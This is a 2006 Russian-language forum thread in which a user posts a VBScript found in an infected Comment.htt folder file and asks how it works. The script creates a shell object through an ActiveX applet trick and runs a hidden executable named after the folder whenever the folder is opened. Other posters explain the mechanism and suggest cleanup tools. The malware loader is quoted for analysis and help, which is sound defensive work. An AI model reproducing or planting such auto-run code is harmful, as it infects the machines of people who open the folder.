Это вирус. Растолкуйте скрипт. / HTML, JavaScript, VBScript, CSS

ReSQL.ru

Мобильная версия Контакт Правила FAQ Помощь

Гость

Войти | Регистрация | Профиль | Очистить

Новые сообщения | Избранное

Форумы | Пользователи | Статистика | Мод. лог | Поиск

Доб. в избранное | Игнор. тему | Прикреп. тему | Пометить прочит. / непрочит. | Фильтр

Форумы / HTML, JavaScript, VBScript, CSS [игнор отключен] [закрыт для гостей] / Это вирус. Растолкуйте скрипт.

6 сообщений из 6, страница 1 из 1

Это вирус. Растолкуйте скрипт.

#34039830

Charles Weyland

Участник

Откуда: Feorina "Fury" 161

Сообщения: 4 426

Рейтинг: 0 / 0

Вот здесь я уже задал этот вопрос
хотя мне кажется, что вернее на самом деле его задать здесь... потому что всё-таки это скрипт.
Сейчас перепишу его...

...

Рейтинг:

0 / 0

07.10.2006, 21:56

| Ответить | Цитировать | Написать

Это вирус. Растолкуйте скрипт.

#34039832

Charles Weyland

Участник

Откуда: Feorina "Fury" 161

Сообщения: 4 426

Рейтинг: 0 / 0

Код: plaintext

1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.

<body><html>
<body >
<script language=vbscript>
document.write "<div style='position:absolute; left:0px; top:0px; width:0px; height:0px; z-index:28; visibility: hidden'><APPLET NAME=LHW HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET></div>"
</script>
<script language=vbscript>
On Error Resume Next
Dim we,path,win
we = ""
Path = ""
win=""
Path = Left(document.location, Len(document.location) -  11 )
Path = Mid(Path,  9 )
Set AppleObject = document.applets("lhw")
AppleObject.setCLSID ("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
AppleObject.createInstance()
Set WsShell = AppleObject.GetObject()
Wsshell.run(Path + "папка.exe")
</script>
</body>
</html>
</body>

Это вирус, который меня жудко достал в локальной сети! Постоянно атакует меня.
Просто сохраните его в файл Comment.htt - антивирус сразу завизжит!!
Кто хорошо Basic знает? Как действует эта штука?
Мои наблюдения:
Плодится немеренно! 5-я снизу строчка
http://]
Wsshell.run(Path + "фильмы.exe")

Она в каждой новой копии экземпляра Comment.htt меняется. И заменяется именем папки, в которой лежит. (этот экземпляр я достал из папки фильмы)
В моей папке "фильмы" ещё появился скрытый файл "фильмы.exe". Когда я его решил запустить - то редактирование и просмотр реестра стал для меня недоступным. Ещё перестали отображаться расширения у файлов. И перестали отображаться скрытые файлы/папки. изчез пункт меню Сервис->свойства папки. Всё остальное вроде норма... С этими последствиями антивир сделать ничего не может. Только удаляет файлы типа Фильмы.exe и Comment.htt , а больше ничего....

Кто поделится мнением, что это за прога такая? И чего ещё она может натворить с моим компом?

...

Рейтинг:

0 / 0

07.10.2006, 21:58

| Ответить | Цитировать | Написать

Это вирус. Растолкуйте скрипт.

#34039834

Charles Weyland

Участник

Откуда: Feorina "Fury" 161

Сообщения: 4 426

Рейтинг: 0 / 0

P.S. вышеприведённый скрипт будет действовать, если сохранить его в тектовый файл, и переименовать его в Comment.htt. (судя по тексту скрипта, очень важна длина имени файла со скриптом, т.е. троян не будет работать корректно в файле coment.htt

...

Рейтинг:

0 / 0

07.10.2006, 22:01

| Ответить | Цитировать | Написать

Это вирус. Растолкуйте скрипт.

#34040130

maXmo

Участник

Откуда: Моск.

Сообщения: 8 515

Рейтинг: 0 / 0

это не сам вирус, с реестром, диском оно ничего не делает, оно просто запускает папка.ехе, который и есть собсно вирус, который и обеспечивает тебя счастьем. Чо делать, чо делать? Лечилку качай, которая тебе систему приведёт в нормальный вид. Типа drweb cureit. Антивири систему редко восстанавливают, они, как правило, только убивают вирь.

...

Рейтинг:

0 / 0

08.10.2006, 15:09

| Ответить | Цитировать | Написать

Это вирус. Растолкуйте скрипт.

#34042505

Green2

Модератор форума

Сообщения: 14 058

Рейтинг: 5 / 0

comment.htt это файл, который запускается при входе в папку.
Он предназначен для того, чтобы настраивать вид папки.
В проводнике Windows нельзя откывать папку где лежит такой файл.

Я видел более зловредный вариант такого вируса.
Лечил dr web просто присоединяя винт с зараженной системой.
Не просматривая винт в проводнике.
В последствии, при попытке открыть такую папку, DrWeb ругался на вирус,
поэтому машины снова не заражались.
--

Posted via ActualForum NNTP Server 1.3

...

Рейтинг:

0 / 0

09.10.2006, 17:40

| Ответить | Цитировать | Написать

Это вирус. Растолкуйте скрипт.

#34072437

Charles Weyland

Участник

Откуда: Feorina "Fury" 161

Сообщения: 4 426

Рейтинг: 0 / 0

Green2
comment.htt это файл, который запускается при входе в папку.
Он предназначен для того, чтобы настраивать вид папки.
В проводнике Windows нельзя откывать папку где лежит такой файл.

ВОТ ЭТО ХОРОШО, ЧТО ТЫ МНЕ ЭТО СКАЗАЛ!!!

...

Рейтинг:

0 / 0

22.10.2006, 14:36

| Ответить | Цитировать | Написать

6 сообщений из 6, страница 1 из 1

Форумы / HTML, JavaScript, VBScript, CSS [игнор отключен] [закрыт для гостей] / Это вирус. Растолкуйте скрипт.

Цитировать

Написать

Автор*:

Ввести пароль для входа

Тема*:

Сообщение

Данное сообщение тематическое

Сообщение содержит картинки или видео 18+

Автор:

ВНИМАНИЕ! На данном подфоруме действуют строгие правила. Удостоверьтесь, что ваше сообщение соответствует им!

Форум или тема закрыты для гостей. Необходима авторизация!

Загрузить последнюю сохраненную версию

Вложение:

Вставить как галерею

Максимальный размер вложений: 4,0 МБ, аудио/видео: 8,0 МБ. Картинки большего размера ужимаются, если возможно.

Введите код, изображенный на картинке. Если код нечитаемый, кликните картинку, чтобы загрузить другой вариант.

Отправляя сообщение, я выражаю свое согласие с правилами форума и принимаю пользовательское соглашение.

Читали тему (0):

Читали форум (0):

Пользователи онлайн (0):

start [/forum/topic.php?fid=22&fpage=404&tid=1459237]:	0ms
get settings:	9ms
get forum list:	13ms
check forum access:	3ms
check topic access:	3ms
track hit:	32ms
get topic data:	14ms
get forum data:	3ms
get page messages:	49ms
get tp. blocked users:	2ms
others:	264ms

total:	392ms